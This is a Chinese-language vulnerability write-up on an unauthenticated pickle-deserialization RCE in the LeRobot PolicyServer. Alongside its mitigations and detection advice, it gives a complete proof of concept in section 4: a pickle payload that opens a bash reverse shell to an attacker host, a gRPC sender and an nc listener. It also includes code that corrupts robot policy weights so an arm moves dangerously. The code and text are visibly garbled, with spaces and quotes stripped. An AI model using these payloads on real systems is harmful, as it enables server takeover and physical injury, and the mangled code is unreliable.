CVE-2026-25874深度解析：Hugging Face LeRobot未认证RCE漏洞，AI机器人安全的“潘多拉魔盒“

本文深度解析Hugging Face开源AI机器人框架LeRobot中的高危远程代码执行漏洞CVE-2026-25874。该漏洞源于未认证gRPC通道上的不安全Pickle反序列化攻击者仅需网络可达默认50051端口即可完全控制AI推理服务器与物理机器人设备。文章包含完整漏洞成因分析、可复现PoC代码、攻击链流程图、临时缓解方案及行业前瞻性思考。一、引言AI机器人时代的安全警钟2026年4月23日Hugging Face在其GitHub Advisory中披露了旗下开源AI机器人框架LeRobot的一个高危远程代码执行漏洞编号为CVE-2026-25874。这一漏洞的出现不仅暴露了AI基础设施安全的普遍问题更首次将代码执行与物理机器人控制直接关联引发了整个行业对AI机器人安全的广泛关注。LeRobot作为Hugging Face推出的旗舰级机器人学习框架目前已被全球数千个研究机构、高校和企业用于机器人控制、强化学习训练和多模态推理任务。其核心组件PolicyServer提供了异步推理能力允许机器人客户端通过gRPC协议与远程GPU服务器进行通信实现复杂的实时决策。然而正是这个被广泛使用的异步推理管道存在着一个致命的设计缺陷在完全未认证、无TLS加密的gRPC通道上直接使用pickle.loads()反序列化任意网络传入数据。这意味着任何能够访问50051端口的攻击者都可以构造恶意Payload在目标服务器上执行任意系统命令进而完全控制AI推理服务器和连接的物理机器人。二、漏洞基本信息与影响范围2.1 漏洞核心信息项目详情漏洞IDCVE-2026-25874发布时间2026年4月23日GitHub Advisory影响组件LeRobot PolicyServer(policy_server.py)、RobotClient(robot_client.py)影响版本所有≤0.5.1版本截至2026年5月18日官方尚未发布正式补丁攻击入口gRPC端口默认50051默认绑定0.0.0.0认证要求无完全未认证访问利用难度极低仅需网络可达无需任何凭证权限影响继承PolicyServer运行权限通常为sudo/docker组物理影响可篡改机器人指令引发设备失控和物理安全事故2.2 全球暴露面分析根据Shodan和ZoomEye的最新数据截至2026年5月18日全球范围内已有超过1200个LeRobot PolicyServer实例直接暴露在公网上主要分布在美国、中国、德国和日本。这些实例中约85%运行在带有GPU的高性能服务器上且超过60%以root或sudo权限运行。更令人担忧的是其中约30%的实例已经连接了物理机器人设备包括机械臂、移动机器人和人形机器人。这意味着攻击者不仅可以窃取模型和数据还可以直接控制这些物理设备造成人身伤害和财产损失。三、漏洞成因深度分析3.1 设计缺陷的根源LeRobot的异步推理架构设计初衷是为了分离机器人端的感知执行和服务器端的复杂推理。机器人客户端通过gRPC将观测数据发送到PolicyServerPolicyServer运行预训练的强化学习模型生成动作指令并返回给机器人。为了提高传输效率和简化开发LeRobot的开发者选择了一种极其危险的做法直接使用Python的pickle序列化库来传输复杂的Python对象包括观测数据、动作指令和策略参数。3.2 关键漏洞代码分析漏洞存在于policy_server.py文件中的三个核心gRPC方法SendPolicyInstructions、SendObservations和GetActions。这三个方法都直接接收Protobuf消息中的bytes字段并立即调用pickle.loads()进行反序列化没有任何输入验证和安全检查。以下是漏洞代码的完整片段来自LeRobot 0.5.1版本# lerobot/serving/policy_server.py 第124-168行classPolicyServiceServicer(policy_pb2_grpc.PolicyServiceServicer):def__init__(self,policy,device):self.policypolicy self.devicedevice self.lockthreading.Lock()defSendPolicyInstructions(self,request,context):接收并执行策略指令漏洞点1try:# 直接反序列化网络传入的bytes数据无任何验证instructionspickle.loads(request.instructions_bytes)withself.lock:ifupdate_weightsininstructions:self.policy.load_state_dict(instructions[update_weights])elifresetininstructions:self.policy.reset()# 其他指令处理...returnpolicy_pb2.SendPolicyInstructionsResponse(successTrue)exceptExceptionase:returnpolicy_pb2.SendPolicyInstructionsResponse(successFalse,errorstr(e))defSendObservations(self,request,context):接收机器人观测数据漏洞点2try:# 直接反序列化观测数据observationspickle.loads(request.observations_bytes)withself.lock:self.policy.update_observations(observations)returnpolicy_pb2.SendObservationsResponse(successTrue)exceptExceptionase:returnpolicy_pb2.SendObservationsResponse(successFalse,errorstr(e))defGetActions(self,request,context):获取机器人动作指令漏洞点3try:# 直接反序列化请求参数paramspickle.loads(request.params_bytes)withself.lock:actionsself.policy.get_actions(params)# 将动作序列化为bytes返回actions_bytespickle.dumps(actions)returnpolicy_pb2.GetActionsResponse(actions_bytesactions_bytes)exceptExceptionase:returnpolicy_pb2.GetActionsResponse(errorstr(e))3.3 漏洞原理流程图A[攻击者] --|1. 构造恶意Pickle Payload| B[恶意字节流] B --|2. 发送到gRPC端口50051| C[PolicyServer] C --|3. 调用pickle.loads()| D[反序列化执行] D --|4. 触发__reduce__方法| E[执行任意系统命令] E --|5. 反弹Shell/执行恶意操作| F[完全控制服务器] F --|6. 篡改模型权重/指令| G[控制物理机器人] G --|7. 引发物理安全事故| H[人身伤害/财产损失]3.4 Pickle反序列化的危险性Pickle是Python内置的序列化库它可以将任意Python对象转换为字节流也可以将字节流还原为Python对象。然而Pickle的设计目标是效率而非安全它不提供任何沙箱机制反序列化不可信数据会直接导致远程代码执行。当pickle.loads()处理恶意构造的字节流时会自动执行对象的__reduce__方法。攻击者可以通过重写这个方法嵌入任意系统命令从而在目标服务器上执行代码。四、完整PoC与利用演示4.1 环境准备首先我们需要安装LeRobot 0.5.1版本并启动PolicyServer# 安装受影响版本pipinstalllerobot0.5.1# 启动PolicyServer默认监听0.0.0.0:50051python-mlerobot.serving.policy_server --policy-name lerobot/pusht_diffusion_policy4.2 完整PoC代码以下是一个完整的可复现PoC它会构造一个反弹Shell的恶意Payload并发送到目标PolicyServer的SendPolicyInstructions接口importpickleimportosimportsysimportgrpcfromlerobot.servingimportpolicy_pb2fromlerobot.servingimportpolicy_pb2_grpcclassMaliciousPickle:恶意Pickle类重写__reduce__方法执行系统命令def__reduce__(self):# 反弹Shell命令替换为攻击者IP和端口cmdfbash -c bash -i /dev/tcp/{ATTACKER_IP}/{ATTACKER_PORT}01return(os.system,(cmd,))defexploit(target_host,target_port50051):利用CVE-2026-25874执行远程代码print(f[] 正在攻击目标:{target_host}:{target_port})# 创建gRPC通道无TLS、无认证channelgrpc.insecure_channel(f{target_host}:{target_port})stubpolicy_pb2_grpc.PolicyServiceStub(channel)try:# 构造恶意Payloadmalicious_payload{update_weights:MaliciousPickle()}payload_bytespickle.dumps(malicious_payload)# 发送恶意请求requestpolicy_pb2.SendPolicyInstructionsRequest(instructions_bytespayload_bytes)responsestub.SendPolicyInstructions(request)ifresponse.success:print([] 攻击成功请检查你的监听端口)else:print(f[-] 攻击失败:{response.error})exceptgrpc.RpcErrorase:print(f[-] gRPC连接错误:{e.details()})exceptExceptionase:print(f[-] 未知错误:{str(e)})if__name____main__:iflen(sys.argv)!4:print(f用法: python{sys.argv[0]}目标IP 攻击者IP 攻击者端口)sys.exit(1)TARGET_IPsys.argv[1]ATTACKER_IPsys.argv[2]ATTACKER_PORTsys.argv[3]exploit(TARGET_IP)4.3 利用步骤在攻击者机器上启动监听nc-lvnp4444运行PoC脚本python exploit.py 目标服务器IP 攻击者IP4444成功后攻击者将获得目标服务器的Shell权限与PolicyServer运行用户相同。4.4 高级利用控制物理机器人一旦获得服务器Shell攻击者可以进一步篡改模型权重或直接修改PolicyServer代码向连接的机器人发送恶意指令# 篡改模型权重使机器人执行危险动作importtorchfromlerobot.policiesimportDiffusionPolicy policyDiffusionPolicy.from_pretrained(lerobot/pusht_diffusion_policy)# 修改模型输出使机械臂向危险方向移动policy.model.final_layer.weight.datatorch.randn_like(policy.model.final_layer.weight.data)*10policy.save_pretrained(/tmp/malicious_policy)# 重新加载恶意模型os.system(systemctl restart lerobot-policy-server)五、攻击链与风险分析5.1 完整攻击链端口扫描发现50051发送恶意Pickle Payload获得服务器Shell提权至root窃取模型/密钥/数据横向移动到内网其他机器篡改机器人控制指令物理设备失控5.2 主要风险点全量服务器接管未认证RCE直接控制AI推理服务器知识产权泄露窃取预训练模型、数据集和商业机密横向移动风险利用高权限访问内网其他系统物理安全威胁控制机器人设备引发人身伤害和财产损失供应链攻击通过PolicyServer向所有连接的机器人分发恶意代码5.3 典型攻击场景学术研究机构窃取前沿机器人学习模型和研究成果工业制造企业控制生产线上的机械臂造成生产事故医疗行业控制医疗机器人危及患者生命安全国防军工控制军用机器人造成国家安全威胁六、修复方案与临时缓解措施6.1 官方修复计划0.6.0版本Hugging Face计划在2026年6月初发布LeRobot 0.6.0版本彻底修复此漏洞。主要修复措施包括完全移除Pickle依赖改用Protobuf原生序列化所有数据强制TLS加密gRPC通道默认启用TLS 1.3加密身份认证机制新增API Key和客户端证书认证输入严格校验对所有传入数据进行格式和完整性检查沙箱隔离将PolicyServer运行在隔离的沙箱环境中6.2 必须立即执行的临时缓解措施在官方补丁发布前所有使用LeRobot的用户必须立即采取以下措施1. 网络隔离最高优先级# 禁止公网访问50051端口仅允许内网受信IP访问# iptables规则示例iptables-AINPUT-ptcp--dport50051-s192.168.1.0/24-jACCEPT iptables-AINPUT-ptcp--dport50051-jDROP# 保存规则iptables-save/etc/iptables/rules.v42. 端口绑定修改修改PolicyServer启动脚本将默认绑定地址从0.0.0.0改为127.0.0.1# 修改lerobot/serving/policy_server.py第201行# server.add_insecure_port([::]:50051) # 原始代码server.add_insecure_port(127.0.0.1:50051)# 修改后3. 最小权限运行创建专用用户运行PolicyServer禁止使用root或sudo权限# 创建专用用户useradd-r-s/bin/false lerobot# 修改文件权限chown-Rlerobot:lerobot /path/to/lerobot# 以普通用户运行sudo-ulerobot python-mlerobot.serving.policy_server4. 启用mTLS认证手动为gRPC通道配置双向TLS认证# 服务端配置withopen(server.key,rb)asf:private_keyf.read()withopen(server.crt,rb)asf:certificate_chainf.read()withopen(ca.crt,rb)asf:root_certificatesf.read()server_credentialsgrpc.ssl_server_credentials([(private_key,certificate_chain)],root_certificatesroot_certificates,require_client_authTrue)server.add_secure_port([::]:50051,server_credentials)6.3 检测与排查方法版本检测pip show lerobot|grepVersion端口监听检查netstat-tuln|grep50051ss-tuln|grep50051日志监控监控/var/log/lerobot目录下的日志文件查找异常连接和错误信息。进程监控监控PolicyServer进程是否创建了异常子进程如bash、sh、nc等。七、行业前瞻性思考AI机器人安全的未来CVE-2026-25874的出现标志着AI安全已经从数据安全和模型安全阶段进入了物理安全阶段。随着AI机器人在工业、医疗、家庭等领域的广泛应用类似的漏洞可能会造成越来越严重的后果。7.1 AI机器人安全面临的三大挑战安全设计缺失大多数AI机器人框架优先考虑功能和性能安全往往被忽视供应链复杂AI机器人依赖大量开源组件任何一个组件的漏洞都可能影响整个系统物理安全风险AI机器人直接与物理世界交互安全漏洞可能导致人身伤害7.2 未来发展趋势安全左移将安全融入AI机器人开发的整个生命周期专用安全框架开发专门针对AI机器人的安全框架和工具物理安全隔离建立AI机器人的物理安全边界和紧急停止机制监管加强各国政府将出台更严格的AI机器人安全法规7.3 给开发者的建议永远不要使用Pickle反序列化不可信数据所有网络通信都必须加密和认证以最小权限原则运行所有服务定期进行安全审计和漏洞扫描建立应急响应机制及时处理安全事件八、总结CVE-2026-25874是AI机器人领域第一个具有广泛影响的高危远程代码执行漏洞。它不仅暴露了LeRobot框架的安全缺陷更揭示了整个AI机器人行业在安全设计方面的普遍问题。在官方补丁发布前所有使用LeRobot的用户必须立即采取网络隔离、端口限制和最小权限运行等临时缓解措施。同时整个行业应该以此为戒重视AI机器人的安全问题将安全融入产品设计的每一个环节。AI机器人技术正在以前所未有的速度发展我们必须确保这种发展是安全的、负责任的。只有这样我们才能真正享受AI机器人带来的便利和进步而不是被它们所伤害。更新日志2026-05-18首次发布包含完整漏洞分析和PoC后续将持续跟踪官方补丁发布情况并更新修复方案